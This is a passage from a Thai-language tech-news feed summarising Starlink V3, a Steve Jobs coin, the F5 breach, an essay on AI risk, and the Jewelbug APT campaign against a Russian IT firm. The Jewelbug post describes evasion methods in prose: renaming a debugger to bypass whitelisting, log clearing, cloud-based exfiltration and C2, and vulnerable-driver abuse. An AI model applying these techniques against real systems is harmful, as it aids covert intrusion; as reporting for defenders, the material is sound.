ในการให้บริการอินเทอร์เน็ตทั่วโลกเป็นจริง อย่างไรก็ตาม ผู้ใช้จะต้องมีฮาร์ดแวร์ใหม่เพื่อรองรับความเร็วที่ดาวเทียม V3 สามารถให้บริการได้ และ SpaceX ยืนยันว่าดาวเทียม V3 จะถูกออกแบบให้เผาไหม้หมดเมื่อหมดอายุการใช้งาน เพื่อลดปัญหาขยะอวกาศ ✅ ข้อมูลในข่าว ➡️ SpaceX เปิดตัวดาวเทียม Starlink V3 ขนาดใหญ่และหนักถึง 2,000 กิโลกรัม ➡️ ใช้ยาน Starship ส่งขึ้นสู่วงโคจร แทน Falcon 9 ➡️ แต่ละเที่ยวบินสามารถบรรทุกดาวเทียม V3 ได้ถึง 60 ดวง ➡️ เพิ่มความจุเครือข่ายมากกว่า 20 เท่าต่อเที่ยวบินเมื่อเทียบกับ V2 Mini ➡️ ความสามารถดาวน์โหลด 1,000 Gbps และอัปโหลด 200 Gbps ต่อดวง ➡️ เพิ่มความจุเครือข่ายรวมถึง 60 Tbps ➡️ ผู้ใช้ต้องมีฮาร์ดแวร์ใหม่เพื่อรองรับความเร็วระดับกิกะบิต ➡️ ดาวเทียม V3 ถูกออกแบบให้เผาไหม้หมดเมื่อหมดอายุการใช้งาน https://www.tomshardware.com/service-providers/network-providers/spacex-shows-off-massive-new-v3-starlink-satellites-expanded-technology-will-deliver-gigabit-internet-to-customers-for-the-first-time-and-enable-60-tera-bits-per-second-downlink-capacity
    0 ความคิดเห็น 0 การแบ่งปัน 123 มุมมอง 0 รีวิว
  • “Steve Jobs จะปรากฏบนเหรียญที่ระลึกมูลค่า $1” — สหรัฐฯ เตรียมยกย่องผู้บุกเบิกนวัตกรรมแห่งแคลิฟอร์เนีย

    Steve Jobs อดีต CEO ของ Apple และบุคคลสำคัญในโลกเทคโนโลยี กำลังจะได้รับเกียรติให้ปรากฏบนเหรียญที่ระลึกมูลค่า 1 ดอลลาร์สหรัฐฯ ในปี 2026 โดยเป็นส่วนหนึ่งของโครงการ American Innovation $1 Coin Program ซึ่งจัดทำโดย United States Mint เพื่อยกย่องนักนวัตกรรมจากแต่ละรัฐในสหรัฐฯ

    Jobs ได้รับเลือกให้เป็นตัวแทนของรัฐแคลิฟอร์เนีย โดยเหรียญจะมีภาพของเขาในวัยหนุ่มนั่งอยู่หน้าภูมิประเทศแบบ “Northern California” ที่เต็มไปด้วยเนินเขาปกคลุมด้วยต้นโอ๊ก พร้อมคำจารึกว่า:

    UNITED STATES OF AMERICA CALIFORNIA STEVE JOBS MAKE SOMETHING WONDERFUL

    การออกแบบนี้สะท้อนถึงจิตวิญญาณแห่งการสร้างสรรค์และการเปลี่ยนโลกด้วยเทคโนโลยี ซึ่งเป็นสิ่งที่ Jobs ได้ฝากไว้ผ่านผลิตภัณฑ์ของ Apple เช่น iPhone, iPad และ Mac

    โครงการนี้ยังครอบคลุมรัฐอื่น ๆ เช่น Iowa, Wisconsin และ Minnesota โดยมีเป้าหมายเพื่อยกย่องบุคคลที่มีบทบาทสำคัญในการผลักดันนวัตกรรมในแต่ละภูมิภาคของประเทศ

    ข้อมูลในข่าว
    Steve Jobs จะปรากฏบนเหรียญที่ระลึกมูลค่า $1 ในปี 2026
    เป็นส่วนหนึ่งของโครงการ American Innovation $1 Coin Program โดย United States Mint
    Jobs ได้รับเลือกให้เป็นตัวแทนของรัฐแคลิฟอร์เนีย
    เหรียญมีภาพ Jobs นั่งหน้าภูมิประเทศ Northern California
    มีคำจารึกว่า “MAKE SOMETHING WONDERFUL”
    โครงการนี้ยกย่องนักนวัตกรรมจากแต่ละรัฐในสหรัฐฯ
    ครอบคลุมรัฐอื่น ๆ เช่น Iowa, Wisconsin และ Minnesota

    https://wccftech.com/apples-steve-jobs-to-feature-on-a-1-commemorative-coin/
    🪙 “Steve Jobs จะปรากฏบนเหรียญที่ระลึกมูลค่า $1” — สหรัฐฯ เตรียมยกย่องผู้บุกเบิกนวัตกรรมแห่งแคลิฟอร์เนีย Steve Jobs อดีต CEO ของ Apple และบุคคลสำคัญในโลกเทคโนโลยี กำลังจะได้รับเกียรติให้ปรากฏบนเหรียญที่ระลึกมูลค่า 1 ดอลลาร์สหรัฐฯ ในปี 2026 โดยเป็นส่วนหนึ่งของโครงการ American Innovation $1 Coin Program ซึ่งจัดทำโดย United States Mint เพื่อยกย่องนักนวัตกรรมจากแต่ละรัฐในสหรัฐฯ Jobs ได้รับเลือกให้เป็นตัวแทนของรัฐแคลิฟอร์เนีย โดยเหรียญจะมีภาพของเขาในวัยหนุ่มนั่งอยู่หน้าภูมิประเทศแบบ “Northern California” ที่เต็มไปด้วยเนินเขาปกคลุมด้วยต้นโอ๊ก พร้อมคำจารึกว่า: UNITED STATES OF AMERICA CALIFORNIA STEVE JOBS MAKE SOMETHING WONDERFUL การออกแบบนี้สะท้อนถึงจิตวิญญาณแห่งการสร้างสรรค์และการเปลี่ยนโลกด้วยเทคโนโลยี ซึ่งเป็นสิ่งที่ Jobs ได้ฝากไว้ผ่านผลิตภัณฑ์ของ Apple เช่น iPhone, iPad และ Mac โครงการนี้ยังครอบคลุมรัฐอื่น ๆ เช่น Iowa, Wisconsin และ Minnesota โดยมีเป้าหมายเพื่อยกย่องบุคคลที่มีบทบาทสำคัญในการผลักดันนวัตกรรมในแต่ละภูมิภาคของประเทศ ✅ ข้อมูลในข่าว ➡️ Steve Jobs จะปรากฏบนเหรียญที่ระลึกมูลค่า $1 ในปี 2026 ➡️ เป็นส่วนหนึ่งของโครงการ American Innovation $1 Coin Program โดย United States Mint ➡️ Jobs ได้รับเลือกให้เป็นตัวแทนของรัฐแคลิฟอร์เนีย ➡️ เหรียญมีภาพ Jobs นั่งหน้าภูมิประเทศ Northern California ➡️ มีคำจารึกว่า “MAKE SOMETHING WONDERFUL” ➡️ โครงการนี้ยกย่องนักนวัตกรรมจากแต่ละรัฐในสหรัฐฯ ➡️ ครอบคลุมรัฐอื่น ๆ เช่น Iowa, Wisconsin และ Minnesota https://wccftech.com/apples-steve-jobs-to-feature-on-a-1-commemorative-coin/
    WCCFTECH.COM
    Apple's Steve Jobs To Feature On A $1 Commemorative Coin
    The ex-CEO of Apple and a veritable tech icon, Steve Jobs, is slated to receive a posthumous honor from the United States Mint in 2026.
    0 ความคิดเห็น 0 การแบ่งปัน 107 มุมมอง 0 รีวิว
  • “F5 ถูกเจาะระบบโดยกลุ่มแฮกเกอร์ระดับรัฐ” — ซอร์สโค้ดและข้อมูลช่องโหว่หลุด เสี่ยงต่อการโจมตีในอนาคต

    บริษัท F5 ซึ่งเป็นผู้พัฒนาโซลูชันด้านเครือข่ายและความปลอดภัย เช่น BIG-IP ถูกเจาะระบบโดยกลุ่มแฮกเกอร์ที่เชื่อว่าได้รับการสนับสนุนจากรัฐ (nation-state actor) โดยการโจมตีเกิดขึ้นในช่วงก่อนเดือนสิงหาคม 2025 และเพิ่งถูกเปิดเผยในเดือนตุลาคม

    แฮกเกอร์สามารถเข้าถึงระบบภายในของ F5 ได้เป็นเวลานาน และขโมยข้อมูลสำคัญ เช่น ส่วนหนึ่งของซอร์สโค้ด BIG-IP, งานวิจัยเกี่ยวกับช่องโหว่ และข้อมูลการตั้งค่าของลูกค้าบางราย แม้ว่า F5 จะยืนยันว่าไม่มีการแก้ไขระบบ build หรือกลไกการอัปเดตซอฟต์แวร์ แต่ผู้เชี่ยวชาญเตือนว่าข้อมูลที่หลุดอาจถูกนำไปใช้ในการพัฒนาเครื่องมือเจาะระบบในอนาคต

    หน่วยงานด้านความมั่นคงของสหราชอาณาจักร (NCSC) ยืนยันว่าการโจมตีครั้งนี้มีลักษณะเป็นการแทรกซึมแบบต่อเนื่อง (APT) และมีเป้าหมายเพื่อศึกษาการทำงานของผลิตภัณฑ์ F5 อย่างลึกซึ้ง ซึ่งอาจนำไปสู่การโจมตีแบบ supply chain หรือการเจาะระบบของลูกค้าระดับองค์กรและรัฐบาล

    ผู้เชี่ยวชาญด้านความปลอดภัยแนะนำให้ผู้ใช้งานผลิตภัณฑ์ของ F5 ตรวจสอบการตั้งค่าการเข้าถึง และติดตั้งแพตช์ล่าสุดโดยเร็วที่สุด เพื่อป้องกันการถูกโจมตีจากข้อมูลที่หลุด

    ข้อมูลในข่าว
    F5 ถูกเจาะระบบโดยกลุ่มแฮกเกอร์ที่เชื่อว่าได้รับการสนับสนุนจากรัฐ
    ข้อมูลที่ถูกขโมยรวมถึงซอร์สโค้ด BIG-IP และงานวิจัยช่องโหว่
    มีการเข้าถึงระบบภายในเป็นเวลานานก่อนถูกตรวจพบ
    ไม่มีหลักฐานว่าระบบ build หรือกลไกอัปเดตถูกแก้ไข
    หน่วยงาน NCSC ยืนยันว่าเป็นการโจมตีแบบ APT
    เป้าหมายคือการศึกษาการทำงานของผลิตภัณฑ์ F5 อย่างลึกซึ้ง
    ผู้ใช้งานควรติดตั้งแพตช์ล่าสุดและตรวจสอบการตั้งค่าการเข้าถึง
    การโจมตีอาจนำไปสู่การเจาะระบบของลูกค้าผ่าน supply chain

    คำเตือนจากข้อมูลข่าว
    ข้อมูลซอร์สโค้ดและช่องโหว่ที่หลุดอาจถูกใช้ในการพัฒนาเครื่องมือเจาะระบบ
    การแทรกซึมแบบต่อเนื่องทำให้การตรวจจับยากและอาจเกิดความเสียหายระยะยาว
    ลูกค้าของ F5 อาจตกเป็นเป้าหมายจากข้อมูลที่หลุด
    การไม่อัปเดตแพตช์ล่าสุดอาจเปิดช่องให้ถูกโจมตีจากช่องโหว่ที่ถูกเปิดเผย
    การโจมตีแบบ nation-state มักมีเป้าหมายเชิงยุทธศาสตร์และยากต่อการป้องกัน

    https://hackread.com/f5-breach-source-code-vulnerability-data-stolen/
    🛡️ “F5 ถูกเจาะระบบโดยกลุ่มแฮกเกอร์ระดับรัฐ” — ซอร์สโค้ดและข้อมูลช่องโหว่หลุด เสี่ยงต่อการโจมตีในอนาคต บริษัท F5 ซึ่งเป็นผู้พัฒนาโซลูชันด้านเครือข่ายและความปลอดภัย เช่น BIG-IP ถูกเจาะระบบโดยกลุ่มแฮกเกอร์ที่เชื่อว่าได้รับการสนับสนุนจากรัฐ (nation-state actor) โดยการโจมตีเกิดขึ้นในช่วงก่อนเดือนสิงหาคม 2025 และเพิ่งถูกเปิดเผยในเดือนตุลาคม แฮกเกอร์สามารถเข้าถึงระบบภายในของ F5 ได้เป็นเวลานาน และขโมยข้อมูลสำคัญ เช่น ส่วนหนึ่งของซอร์สโค้ด BIG-IP, งานวิจัยเกี่ยวกับช่องโหว่ และข้อมูลการตั้งค่าของลูกค้าบางราย แม้ว่า F5 จะยืนยันว่าไม่มีการแก้ไขระบบ build หรือกลไกการอัปเดตซอฟต์แวร์ แต่ผู้เชี่ยวชาญเตือนว่าข้อมูลที่หลุดอาจถูกนำไปใช้ในการพัฒนาเครื่องมือเจาะระบบในอนาคต หน่วยงานด้านความมั่นคงของสหราชอาณาจักร (NCSC) ยืนยันว่าการโจมตีครั้งนี้มีลักษณะเป็นการแทรกซึมแบบต่อเนื่อง (APT) และมีเป้าหมายเพื่อศึกษาการทำงานของผลิตภัณฑ์ F5 อย่างลึกซึ้ง ซึ่งอาจนำไปสู่การโจมตีแบบ supply chain หรือการเจาะระบบของลูกค้าระดับองค์กรและรัฐบาล ผู้เชี่ยวชาญด้านความปลอดภัยแนะนำให้ผู้ใช้งานผลิตภัณฑ์ของ F5 ตรวจสอบการตั้งค่าการเข้าถึง และติดตั้งแพตช์ล่าสุดโดยเร็วที่สุด เพื่อป้องกันการถูกโจมตีจากข้อมูลที่หลุด ✅ ข้อมูลในข่าว ➡️ F5 ถูกเจาะระบบโดยกลุ่มแฮกเกอร์ที่เชื่อว่าได้รับการสนับสนุนจากรัฐ ➡️ ข้อมูลที่ถูกขโมยรวมถึงซอร์สโค้ด BIG-IP และงานวิจัยช่องโหว่ ➡️ มีการเข้าถึงระบบภายในเป็นเวลานานก่อนถูกตรวจพบ ➡️ ไม่มีหลักฐานว่าระบบ build หรือกลไกอัปเดตถูกแก้ไข ➡️ หน่วยงาน NCSC ยืนยันว่าเป็นการโจมตีแบบ APT ➡️ เป้าหมายคือการศึกษาการทำงานของผลิตภัณฑ์ F5 อย่างลึกซึ้ง ➡️ ผู้ใช้งานควรติดตั้งแพตช์ล่าสุดและตรวจสอบการตั้งค่าการเข้าถึง ➡️ การโจมตีอาจนำไปสู่การเจาะระบบของลูกค้าผ่าน supply chain ‼️ คำเตือนจากข้อมูลข่าว ⛔ ข้อมูลซอร์สโค้ดและช่องโหว่ที่หลุดอาจถูกใช้ในการพัฒนาเครื่องมือเจาะระบบ ⛔ การแทรกซึมแบบต่อเนื่องทำให้การตรวจจับยากและอาจเกิดความเสียหายระยะยาว ⛔ ลูกค้าของ F5 อาจตกเป็นเป้าหมายจากข้อมูลที่หลุด ⛔ การไม่อัปเดตแพตช์ล่าสุดอาจเปิดช่องให้ถูกโจมตีจากช่องโหว่ที่ถูกเปิดเผย ⛔ การโจมตีแบบ nation-state มักมีเป้าหมายเชิงยุทธศาสตร์และยากต่อการป้องกัน https://hackread.com/f5-breach-source-code-vulnerability-data-stolen/
    HACKREAD.COM
    F5 Confirms Nation-State Breach, Source Code and Vulnerability Data Stolen
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 80 มุมมอง 0 รีวิว
  • “ทำไมเจ้านายคุณไม่กลัว AI” — ความเข้าใจผิดที่อันตรายระหว่างซอฟต์แวร์ทั่วไปกับระบบปัญญาประดิษฐ์

    บทความนี้ชวนเรามองลึกถึงช่องว่างความเข้าใจระหว่างผู้เชี่ยวชาญด้าน AI กับคนทั่วไป โดยเฉพาะในองค์กรที่ผู้บริหารอาจมองว่า “AI ก็เหมือนซอฟต์แวร์ทั่วไป” ซึ่งเป็นความเข้าใจผิดที่อาจนำไปสู่การตัดสินใจที่เสี่ยง

    ผู้เขียนอธิบายว่า คนทั่วไปเข้าใจดีว่า “บั๊กในซอฟต์แวร์” อาจสร้างความเสียหายได้ แต่ก็เชื่อว่ามันสามารถแก้ไขได้เหมือนการหาจุดผิดในโค้ด แล้วแก้ให้ถูกต้อง ซึ่งใช้ได้กับซอฟต์แวร์ทั่วไป แต่ใช้ไม่ได้กับ AI

    AI ไม่ได้ทำงานจากโค้ดที่เขียนทีละบรรทัด แต่เกิดจากการฝึกด้วยข้อมูลมหาศาล ซึ่งไม่มีใครรู้ครบว่ามีอะไรอยู่ในนั้น เช่น ชุดข้อมูล FineWeb ที่ใช้ฝึกโมเดลมีคำกว่า 11.25 ล้านล้านคำ — ถ้าคนอ่านวันละ 250 คำ จะใช้เวลาถึง 85,000 ปี!

    เมื่อ AI ทำพฤติกรรมผิดปกติ เราไม่สามารถชี้ชัดได้ว่าเกิดจากข้อมูลไหน ต่างจากซอฟต์แวร์ทั่วไปที่สามารถไล่โค้ดย้อนกลับได้อย่างแม่นยำ นักวิจัยจึงใช้วิธี “ฝึกใหม่ด้วยข้อมูลเพิ่ม” แทนการแก้จุดเดียว

    นอกจากนี้ AI ยังมีพฤติกรรมที่ไม่เสถียร เช่น การตอบต่างกันแม้เปลี่ยนคำถามเพียงเล็กน้อย และไม่สามารถควบคุมให้ทำตามสเปกได้เหมือนซอฟต์แวร์ทั่วไป แม้จะตั้งเป้าหมายไว้ว่า “ห้ามตอบคำถามผิดกฎหมาย” ก็ไม่มีใครรับประกันได้ว่า AI จะไม่หลุดพฤติกรรมในบางสถานการณ์

    ผู้เขียนเสนอว่า สิ่งสำคัญคือการสร้างความเข้าใจร่วมกันระหว่างผู้เชี่ยวชาญและคนทั่วไป โดยเฉพาะในองค์กรที่ต้องตัดสินใจเกี่ยวกับการนำ AI มาใช้ เพราะความเข้าใจผิดอาจนำไปสู่การประเมินความเสี่ยงต่ำเกินจริง

    ข้อมูลในข่าว
    คนทั่วไปเข้าใจว่บั๊กในซอฟต์แวร์สามารถแก้ได้ แต่ใช้ไม่ได้กับ AI
    AI ทำงานจากการฝึกด้วยข้อมูลมหาศาล ไม่ใช่โค้ดที่เขียนทีละบรรทัด
    ไม่มีใครรู้ครบว่าข้อมูลฝึก AI มีอะไรบ้าง เช่น FineWeb มีคำกว่า 11.25 ล้านล้านคำ
    พฤติกรรมผิดปกติใน AI ไม่สามารถชี้ชัดได้ว่าเกิดจากข้อมูลไหน
    นักวิจัยใช้วิธีฝึกใหม่ด้วยข้อมูลเพิ่ม แทนการแก้จุดเดียว
    AI ตอบต่างกันแม้เปลี่ยนคำถามเพียงเล็กน้อย เช่น เพิ่มเครื่องหมายคำถาม
    ไม่สามารถควบคุมให้ AI ทำตามสเปกได้เหมือนซอฟต์แวร์ทั่วไป
    ความสามารถบางอย่างของ AI ถูกค้นพบโดยผู้ใช้ทั่วไปหลังเปิดตัว
    ไม่มีใครรับประกันได้ว่า AI จะไม่แสดงพฤติกรรมอันตรายในอนาคต
    ช่องว่างความเข้าใจระหว่างผู้เชี่ยวชาญกับคนทั่วไปเป็นปัญหาสำคัญ

    คำเตือนจากข้อมูลข่าว
    การเข้าใจว่า AI เป็นแค่ซอฟต์แวร์ทั่วไปอาจนำไปสู่การประเมินความเสี่ยงผิดพลาด
    การคิดว่า “แก้บั๊กแล้วจบ” ใช้ไม่ได้กับระบบที่เรียนรู้จากข้อมูล
    การใช้ AI โดยไม่เข้าใจโครงสร้างการฝึก อาจเปิดช่องให้เกิดพฤติกรรมไม่คาดคิด
    การเปลี่ยนคำถามเล็กน้อยอาจทำให้ AI ตอบต่างกันอย่างสิ้นเชิง
    การตั้งสเปกให้ AI “ห้ามทำสิ่งผิด” ไม่สามารถรับประกันผลลัพธ์ได้
    ความสามารถที่ซ่อนอยู่ใน AI อาจเป็นอันตราย หากถูกค้นพบโดยผู้ไม่หวังดี
    การสื่อสารที่ไม่ชัดเจนระหว่างฝ่ายเทคนิคกับผู้บริหารอาจทำให้การตัดสินใจผิดพลาด

    https://boydkane.com/essays/boss
    🧠 “ทำไมเจ้านายคุณไม่กลัว AI” — ความเข้าใจผิดที่อันตรายระหว่างซอฟต์แวร์ทั่วไปกับระบบปัญญาประดิษฐ์ บทความนี้ชวนเรามองลึกถึงช่องว่างความเข้าใจระหว่างผู้เชี่ยวชาญด้าน AI กับคนทั่วไป โดยเฉพาะในองค์กรที่ผู้บริหารอาจมองว่า “AI ก็เหมือนซอฟต์แวร์ทั่วไป” ซึ่งเป็นความเข้าใจผิดที่อาจนำไปสู่การตัดสินใจที่เสี่ยง ผู้เขียนอธิบายว่า คนทั่วไปเข้าใจดีว่า “บั๊กในซอฟต์แวร์” อาจสร้างความเสียหายได้ แต่ก็เชื่อว่ามันสามารถแก้ไขได้เหมือนการหาจุดผิดในโค้ด แล้วแก้ให้ถูกต้อง ซึ่งใช้ได้กับซอฟต์แวร์ทั่วไป แต่ใช้ไม่ได้กับ AI AI ไม่ได้ทำงานจากโค้ดที่เขียนทีละบรรทัด แต่เกิดจากการฝึกด้วยข้อมูลมหาศาล ซึ่งไม่มีใครรู้ครบว่ามีอะไรอยู่ในนั้น เช่น ชุดข้อมูล FineWeb ที่ใช้ฝึกโมเดลมีคำกว่า 11.25 ล้านล้านคำ — ถ้าคนอ่านวันละ 250 คำ จะใช้เวลาถึง 85,000 ปี! เมื่อ AI ทำพฤติกรรมผิดปกติ เราไม่สามารถชี้ชัดได้ว่าเกิดจากข้อมูลไหน ต่างจากซอฟต์แวร์ทั่วไปที่สามารถไล่โค้ดย้อนกลับได้อย่างแม่นยำ นักวิจัยจึงใช้วิธี “ฝึกใหม่ด้วยข้อมูลเพิ่ม” แทนการแก้จุดเดียว นอกจากนี้ AI ยังมีพฤติกรรมที่ไม่เสถียร เช่น การตอบต่างกันแม้เปลี่ยนคำถามเพียงเล็กน้อย และไม่สามารถควบคุมให้ทำตามสเปกได้เหมือนซอฟต์แวร์ทั่วไป แม้จะตั้งเป้าหมายไว้ว่า “ห้ามตอบคำถามผิดกฎหมาย” ก็ไม่มีใครรับประกันได้ว่า AI จะไม่หลุดพฤติกรรมในบางสถานการณ์ ผู้เขียนเสนอว่า สิ่งสำคัญคือการสร้างความเข้าใจร่วมกันระหว่างผู้เชี่ยวชาญและคนทั่วไป โดยเฉพาะในองค์กรที่ต้องตัดสินใจเกี่ยวกับการนำ AI มาใช้ เพราะความเข้าใจผิดอาจนำไปสู่การประเมินความเสี่ยงต่ำเกินจริง ✅ ข้อมูลในข่าว ➡️ คนทั่วไปเข้าใจว่บั๊กในซอฟต์แวร์สามารถแก้ได้ แต่ใช้ไม่ได้กับ AI ➡️ AI ทำงานจากการฝึกด้วยข้อมูลมหาศาล ไม่ใช่โค้ดที่เขียนทีละบรรทัด ➡️ ไม่มีใครรู้ครบว่าข้อมูลฝึก AI มีอะไรบ้าง เช่น FineWeb มีคำกว่า 11.25 ล้านล้านคำ ➡️ พฤติกรรมผิดปกติใน AI ไม่สามารถชี้ชัดได้ว่าเกิดจากข้อมูลไหน ➡️ นักวิจัยใช้วิธีฝึกใหม่ด้วยข้อมูลเพิ่ม แทนการแก้จุดเดียว ➡️ AI ตอบต่างกันแม้เปลี่ยนคำถามเพียงเล็กน้อย เช่น เพิ่มเครื่องหมายคำถาม ➡️ ไม่สามารถควบคุมให้ AI ทำตามสเปกได้เหมือนซอฟต์แวร์ทั่วไป ➡️ ความสามารถบางอย่างของ AI ถูกค้นพบโดยผู้ใช้ทั่วไปหลังเปิดตัว ➡️ ไม่มีใครรับประกันได้ว่า AI จะไม่แสดงพฤติกรรมอันตรายในอนาคต ➡️ ช่องว่างความเข้าใจระหว่างผู้เชี่ยวชาญกับคนทั่วไปเป็นปัญหาสำคัญ ‼️ คำเตือนจากข้อมูลข่าว ⛔ การเข้าใจว่า AI เป็นแค่ซอฟต์แวร์ทั่วไปอาจนำไปสู่การประเมินความเสี่ยงผิดพลาด ⛔ การคิดว่า “แก้บั๊กแล้วจบ” ใช้ไม่ได้กับระบบที่เรียนรู้จากข้อมูล ⛔ การใช้ AI โดยไม่เข้าใจโครงสร้างการฝึก อาจเปิดช่องให้เกิดพฤติกรรมไม่คาดคิด ⛔ การเปลี่ยนคำถามเล็กน้อยอาจทำให้ AI ตอบต่างกันอย่างสิ้นเชิง ⛔ การตั้งสเปกให้ AI “ห้ามทำสิ่งผิด” ไม่สามารถรับประกันผลลัพธ์ได้ ⛔ ความสามารถที่ซ่อนอยู่ใน AI อาจเป็นอันตราย หากถูกค้นพบโดยผู้ไม่หวังดี ⛔ การสื่อสารที่ไม่ชัดเจนระหว่างฝ่ายเทคนิคกับผู้บริหารอาจทำให้การตัดสินใจผิดพลาด https://boydkane.com/essays/boss
    0 ความคิดเห็น 0 การแบ่งปัน 87 มุมมอง 0 รีวิว
  • “Jewelbug จากจีนล้วงข้อมูลบริษัท IT รัสเซีย 5 เดือนเต็ม” — ใช้ Yandex Cloud และ Microsoft Graph API พรางตัวแบบแนบเนียน

    ในรายงานล่าสุดจากทีม Symantec Threat Hunter ได้เปิดเผยการโจมตีไซเบอร์ที่น่าตกใจโดยกลุ่ม APT จากจีนชื่อ “Jewelbug” ซึ่งสามารถแทรกซึมเข้าไปในระบบของบริษัท IT สัญชาติรัสเซียได้นานถึง 5 เดือนในช่วงต้นปี 2025 โดยใช้เทคนิคที่ซับซ้อนและแอบแฝงผ่านบริการคลาวด์ที่ได้รับความนิยมในรัสเซียอย่าง Yandex Cloud รวมถึงใช้ Microsoft Graph API และ OneDrive เป็นช่องทางควบคุมมัลแวร์ (C2) เพื่อหลบเลี่ยงการตรวจจับจากระบบรักษาความปลอดภัยทั่วไป

    การโจมตีครั้งนี้ถือเป็นการเปลี่ยนแปลงเชิงยุทธศาสตร์ของจีนในด้านการจารกรรมไซเบอร์ โดยก่อนหน้านี้กลุ่ม APT จากจีนมักไม่โจมตีเป้าหมายในรัสเซีย แต่หลังจากสงครามยูเครนเริ่มต้น ความร่วมมือระหว่างสองประเทศในโลกไซเบอร์เริ่มสั่นคลอน และ Jewelbug ก็เป็นหนึ่งในกลุ่มที่แสดงให้เห็นถึงการเปลี่ยนแปลงนี้

    Jewelbug ใช้เทคนิคหลากหลาย เช่น การเปลี่ยนชื่อไฟล์ cdb.exe เป็น “7zup.exe” เพื่อหลบ whitelist, การใช้ scheduled tasks เพื่อคงการเข้าถึงระบบ, การล้าง log เพื่อลบร่องรอย และการใช้ไฟล์ “yandex2.exe” ในการส่งข้อมูลออกไปยัง Yandex Cloud

    นอกจากนี้ยังพบมัลแวร์รุ่นใหม่ที่ยังอยู่ในระหว่างการพัฒนา ซึ่งใช้ Microsoft Graph API และ OneDrive เป็นช่องทางควบคุม โดยมีการสร้างโฟลเดอร์ลับในระบบ, อัปโหลดรายการไฟล์, และเก็บข้อมูลระบบ เช่น IP และเวอร์ชัน Windows

    ในแคมเปญก่อนหน้านี้ Jewelbug ยังใช้เทคนิค BYOVD (Bring-Your-Own-Vulnerable-Driver) โดยนำไดรเวอร์จากระบบป้องกันเกม ECHOAC มาใช้เจาะระดับ kernel และใช้เครื่องมือเช่น KillAV, ShadowPad, Mimikatz และ Earthworm เพื่อเคลื่อนย้ายภายในระบบ

    การโจมตีครั้งนี้ไม่เพียงแต่แสดงถึงความสามารถของ Jewelbug แต่ยังชี้ให้เห็นถึงความเสี่ยงด้านซัพพลายเชนที่อาจส่งผลกระทบต่อบริษัทลูกค้าของผู้ให้บริการ IT รัสเซียจำนวนมาก

    ข้อมูลในข่าว
    Jewelbug เป็นกลุ่ม APT จากจีนที่แฮกระบบบริษัท IT รัสเซียได้นานถึง 5 เดือน
    ใช้ Yandex Cloud ในการส่งข้อมูลออกเพื่อหลบเลี่ยงการตรวจจับ
    ใช้ไฟล์ “7zup.exe” ซึ่งเป็น cdb.exe ที่ถูกเปลี่ยนชื่อเพื่อหลบ whitelist
    ใช้ scheduled tasks, credential dumping, log clearing และไฟล์ “yandex2.exe” ในการโจมตี
    พบมัลแวร์ใหม่ที่ใช้ Microsoft Graph API และ OneDrive เป็นช่องทางควบคุม (C2)
    มัลแวร์สามารถสร้างโฟลเดอร์ลับ, อัปโหลดไฟล์, และเก็บข้อมูลระบบ
    ในแคมเปญก่อนหน้านี้ Jewelbug ใช้เทคนิค BYOVD โดยนำไดรเวอร์ ECHOAC มาใช้เจาะระดับ kernel
    ใช้เครื่องมือเช่น KillAV, ShadowPad, Mimikatz, SMBExec และ Earthworm
    มัลแวร์ถูกฝังใน mspaint.exe ซึ่งเป็นเทคนิคเฉพาะของ Jewelbug
    มีความเสี่ยงด้านซัพพลายเชนที่อาจส่งผลต่อบริษัทลูกค้าจำนวนมากในรัสเซีย
    การโจมตีสะท้อนถึงการเปลี่ยนแปลงเชิงยุทธศาสตร์ของจีนหลังสงครามยูเครน

    คำเตือนจากข้อมูลข่าว
    การใช้บริการคลาวด์ที่ได้รับความนิยมในประเทศเป้าหมายอาจทำให้การตรวจจับยากขึ้น
    การเปลี่ยนชื่อไฟล์ระบบเพื่อหลบ whitelist เป็นเทคนิคที่สามารถใช้ได้กับหลายองค์กร
    การใช้ Graph API และ OneDrive เป็นช่องทางควบคุมอาจทำให้มัลแวร์พรางตัวได้ดีในทราฟฟิกปกติ
    การใช้เทคนิค BYOVD และเครื่องมือเจาะระบบระดับ kernel อาจทำให้ระบบป้องกันทั่วไปไม่สามารถตรวจจับได้
    ความเสี่ยงด้านซัพพลายเชนอาจขยายผลไปยังบริษัทอื่น ๆ ที่เชื่อมโยงกับผู้ให้บริการที่ถูกแฮก
    การฝังมัลแวร์ในโปรแกรมทั่วไปอย่าง mspaint.exe ทำให้ผู้ใช้ไม่สงสัยและยากต่อการตรวจสอบ

    https://securityonline.info/chinas-jewelbug-apt-breaches-russian-it-provider-for-5-months-using-yandex-cloud-and-graph-api-c2/
    🕵️ “Jewelbug จากจีนล้วงข้อมูลบริษัท IT รัสเซีย 5 เดือนเต็ม” — ใช้ Yandex Cloud และ Microsoft Graph API พรางตัวแบบแนบเนียน ในรายงานล่าสุดจากทีม Symantec Threat Hunter ได้เปิดเผยการโจมตีไซเบอร์ที่น่าตกใจโดยกลุ่ม APT จากจีนชื่อ “Jewelbug” ซึ่งสามารถแทรกซึมเข้าไปในระบบของบริษัท IT สัญชาติรัสเซียได้นานถึง 5 เดือนในช่วงต้นปี 2025 โดยใช้เทคนิคที่ซับซ้อนและแอบแฝงผ่านบริการคลาวด์ที่ได้รับความนิยมในรัสเซียอย่าง Yandex Cloud รวมถึงใช้ Microsoft Graph API และ OneDrive เป็นช่องทางควบคุมมัลแวร์ (C2) เพื่อหลบเลี่ยงการตรวจจับจากระบบรักษาความปลอดภัยทั่วไป การโจมตีครั้งนี้ถือเป็นการเปลี่ยนแปลงเชิงยุทธศาสตร์ของจีนในด้านการจารกรรมไซเบอร์ โดยก่อนหน้านี้กลุ่ม APT จากจีนมักไม่โจมตีเป้าหมายในรัสเซีย แต่หลังจากสงครามยูเครนเริ่มต้น ความร่วมมือระหว่างสองประเทศในโลกไซเบอร์เริ่มสั่นคลอน และ Jewelbug ก็เป็นหนึ่งในกลุ่มที่แสดงให้เห็นถึงการเปลี่ยนแปลงนี้ Jewelbug ใช้เทคนิคหลากหลาย เช่น การเปลี่ยนชื่อไฟล์ cdb.exe เป็น “7zup.exe” เพื่อหลบ whitelist, การใช้ scheduled tasks เพื่อคงการเข้าถึงระบบ, การล้าง log เพื่อลบร่องรอย และการใช้ไฟล์ “yandex2.exe” ในการส่งข้อมูลออกไปยัง Yandex Cloud นอกจากนี้ยังพบมัลแวร์รุ่นใหม่ที่ยังอยู่ในระหว่างการพัฒนา ซึ่งใช้ Microsoft Graph API และ OneDrive เป็นช่องทางควบคุม โดยมีการสร้างโฟลเดอร์ลับในระบบ, 